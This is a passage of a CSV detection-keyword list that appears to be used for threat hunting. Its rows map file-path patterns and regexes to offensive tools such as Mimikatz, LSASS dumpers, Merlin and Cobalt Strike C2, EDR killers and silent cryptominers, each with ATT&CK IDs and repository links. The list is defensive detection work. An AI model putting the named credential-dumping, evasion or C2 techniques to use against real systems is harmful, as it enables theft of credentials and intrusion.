"*\lsass.DMP",".{0,1000}\\lsass\.DMP","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*\lsass.dmp*",".{0,1000}\\lsass\.dmp.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of beacon object files for use with Cobalt Strike to facilitate","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rookuu/BOFs","1","1","N/A","10","10","160","25","2021-02-11T10:48:12Z","2021-02-11T10:28:48Z" "*\lsass.dmp*",".{0,1000}\\lsass\.dmp.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","N/A","10","5","401","49","2024-04-17T08:06:17Z","2024-02-02T05:56:29Z" "*\lsass.dmp*",".{0,1000}\\lsass\.dmp.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*\lsass.dmp*",".{0,1000}\\lsass\.dmp.{0,1000}","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection.","T1003.001 - T1055 - T1564.001","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*\lsass.rar*",".{0,1000}\\lsass\.rar.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential Access","https://github.com/CCob/MirrorDump","1","0","N/A","10","3","258","59","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z" "*\lsass.zip*",".{0,1000}\\lsass\.zip.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential Access","https://github.com/CCob/MirrorDump","1","0","N/A","10","3","258","59","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z" "*\Lsass_Shtinkering.cpp*",".{0,1000}\\Lsass_Shtinkering\.cpp.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","0","N/A","10","3","223","31","2024-04-27T15:37:50Z","2024-02-22T15:16:16Z" "*\LSASS_Shtinkering.sln*",".{0,1000}\\LSASS_Shtinkering\.sln.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","0","N/A","10","3","223","31","2024-04-27T15:37:50Z","2024-02-22T15:16:16Z" "*\LSASS_Shtinkering\*",".{0,1000}\\LSASS_Shtinkering\\.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","0","N/A","10","3","223","31","2024-04-27T15:37:50Z","2024-02-22T15:16:16Z" "*\LSASSProtectionBypass\*",".{0,1000}\\LSASSProtectionBypass\\.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","3","230","42","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" "*\Lsass-Shtinkering-main*",".{0,1000}\\Lsass\-Shtinkering\-main.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","0","N/A","10","3","223","31","2024-04-27T15:37:50Z","2024-02-22T15:16:16Z" "*\LsassSilentProcessExit*",".{0,1000}\\LsassSilentProcessExit.{0,1000}","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","0","N/A","10","5","430","61","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z" "*\lsassy_dump.py*",".{0,1000}\\lsassy_dump\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\luajit.exe*",".{0,1000}\\luajit\.exe.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hackerhouse-opensource/OffensiveLua","1","0","N/A","8","2","164","26","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z" "*\LyncSniper.ps1*",".{0,1000}\/LyncSniper\.ps1.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1418","263","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" "*\m3-gen.py*",".{0,1000}\\m3\-gen\.py.{0,1000}","offensive_tool_keyword","MaliciousMacroMSBuild","Generates Malicious Macro and Execute Powershell or Shellcode via MSBuild Application Whitelisting Bypass.","T1059.001 - T1059.003 - T1127 - T1027.002","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/MaliciousMacroMSBuild","1","0","N/A","8","5","492","121","2019-08-06T08:16:05Z","2018-04-09T23:16:30Z" "*\MaccaroniC2*",".{0,1000}\\MaccaroniC2.{0,1000}","offensive_tool_keyword","MaccaroniC2","A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.","T1090 - T1059.003","TA0011 - TA0002","N/A","N/A","C2","https://github.com/CalfCrusher/MaccaroniC2","1","0","N/A","10","10","73","12","2023-06-27T17:43:59Z","2023-05-21T13:33:48Z" "*\MachineAccountQuota.py*",".{0,1000}\\MachineAccountQuota\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\macoffe.pdb*",".{0,1000}\\macoffe\.pdb.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*\macro64.vba*",".{0,1000}\\macro64\.vba.{0,1000}","offensive_tool_keyword","spoofing-office-macro","PoC of a VBA macro spawning a process with a spoofed parent and command line","T1055.011 - T1127 - T1077","TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/christophetd/spoofing-office-macro","1","0","N/A","9","4","371","86","2020-04-28T16:23:43Z","2019-03-11T18:23:39Z" "*\maildump.txt*",".{0,1000}\\maildump\.txt.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\MakeMeEnterpriseAdmin.ps1",".{0,1000}\\MakeMeEnterpriseAdmin\.ps1","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","10","10","1456","193","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z" "*\malDll.dll*",".{0,1000}\\malDll\.dll.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","N/A","10","2","129","15","2024-04-19T15:15:35Z","2022-09-13T12:42:13Z" "*\malseclogon.*",".{0,1000}\\malseclogon\..{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*\MalStuff.cpp*",".{0,1000}\\MalStuff\.cpp.{0,1000}","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","0","N/A","9","2","154","27","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z" "*\malware_runner.py*",".{0,1000}\\malware_runner\.py.{0,1000}","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","0","N/A","10","5","421","37","2024-04-18T20:34:47Z","2022-06-14T11:40:21Z" "*\manspider_*.log*",".{0,1000}\\manspider_.{0,1000}\.log.{0,1000}","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","10","926","126","2024-02-27T16:16:14Z","2020-03-18T13:27:20Z" "*\masky.py*",".{0,1000}\\masky\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\masscan\src\*",".{0,1000}\\masscan\\src\\.{0,1000}","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","N/A","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","N/A","N/A","10","22663","2991","2024-03-15T06:32:42Z","2013-07-28T05:35:33Z" "*\master\GPSCoordinates\*",".{0,1000}\\master\\GPSCoordinates\\.{0,1000}","offensive_tool_keyword","GPSCoordinates","Tracks the system's GPS coordinates (accurate within 1km currently) if Location Services are enabled","T1018 - T1059.001","TA0001 - TA0002","N/A","N/A","Reconnaissance","https://github.com/matterpreter/OffensiveCSharp/tree/master/GPSCoordinates","1","0","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*\Mayhem.psm1*",".{0,1000}\\Mayhem\.psm1.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*\MeasureObjectCommand.cs",".{0,1000}\\MeasureObjectCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\mem_dll.pdb*",".{0,1000}\\mem_dll\.pdb.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*\merlin.dll*",".{0,1000}\\merlin\.dll.{0,1000}","offensive_tool_keyword","merlin-agent-dll","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent-dll","1","0","N/A","10","10","49","13","2024-04-23T04:53:57Z","2021-04-17T16:58:24Z" "*\merlin\data\modules\*",".{0,1000}\\merlin\\data\\modules\\.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*\merlinAgent-*.exe*",".{0,1000}\\merlinAgent\-.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*\merlin-agent\*.go*",".{0,1000}\\merlin\-agent\\.{0,1000}\.go.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*\merlin-agent-dll*",".{0,1000}\\merlin\-agent\-dll.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*\merlin-agent-dll\*",".{0,1000}\\merlin\-agent\-dll\\.{0,1000}","offensive_tool_keyword","merlin-agent-dll","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent-dll","1","0","N/A","10","10","49","13","2024-04-23T04:53:57Z","2021-04-17T16:58:24Z" "*\met_inject.py*",".{0,1000}\\met_inject\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\metasploit.go*",".{0,1000}\\metasploit\.go.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*\Meterpeter_*.zip*",".{0,1000}\\Meterpeter_.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\mhydeath64*",".{0,1000}\\mhydeath64.{0,1000}","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/zer0condition/mhydeath","1","0","N/A","10","4","345","63","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z" "*\mimi32.exe*",".{0,1000}\\mimi32\.exe.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*\mimi64.exe*",".{0,1000}\\mimi64\.exe.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*\mimidogz-master*",".{0,1000}\\mimidogz\-master.{0,1000}","offensive_tool_keyword","mimidogz","Rewrite of Invoke-Mimikatz.ps1 to avoid AV detection","T1055 - T1560.001 - T1110.001 - T1003 - T1071","TA0005 - TA0040 - TA0006","N/A","N/A","Credential Access","https://github.com/projectb-temp/mimidogz","1","0","N/A","10","1","0","0","2019-02-11T10:14:10Z","2019-02-11T10:12:08Z" "*\mimikatz.bin*",".{0,1000}\\mimikatz\.bin.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042????","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","0","N/A","10","3","221","48","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z" "*\mimikatz.py*",".{0,1000}\\mimikatz\.py.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","1","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*\mimilib.dll*",".{0,1000}\\mimilib\.dll.{0,1000}","offensive_tool_keyword","Forensike","Remotely dump NT hashes through Windows Crash dumps","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/bmarchev/Forensike","1","0","N/A","10","1","17","2","2024-03-18T10:40:58Z","2024-02-01T13:52:55Z" "*\mimipy.py*",".{0,1000}\\mimipy\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*\MineDownloader.vbs*",".{0,1000}\\MineDownloader\.vbs.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\MinerETH.cs*",".{0,1000}\\MinerETH\.cs.{0,1000}","offensive_tool_keyword","SilentCryptoMiner","A Silent (Hidden) Free Crypto Miner Builder","T1496 - T1055 - T1546 - T1082 - T1574","TA0042 - TA0005 - TA0003 - TA0009","N/A","N/A","Cryptomining","https://github.com/UnamSanctam/SilentCryptoMiner","1","0","N/A","9","10","1032","252","2024-04-11T01:25:28Z","2021-11-08T09:03:32Z" "*\MinerXMR.cs*",".{0,1000}\\MinerXMR\.cs.{0,1000}","offensive_tool_keyword","SilentCryptoMiner","A Silent (Hidden) Free Crypto Miner Builder","T1496 - T1055 - T1546 - T1082 - T1574","TA0042 - TA0005 - TA0003 - TA0009","N/A","N/A","Cryptomining","https://github.com/UnamSanctam/SilentCryptoMiner","1","0","N/A","9","10","1032","252","2024-04-11T01:25:28Z","2021-11-08T09:03:32Z" "*\MiniDump.ps1*",".{0,1000}\\MiniDump\.ps1.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*\minidump-rs.exe*",".{0,1000}\\minidump\-rs\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*\MiniDumpToMem.cs*",".{0,1000}\\MiniDumpToMem\.cs.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential 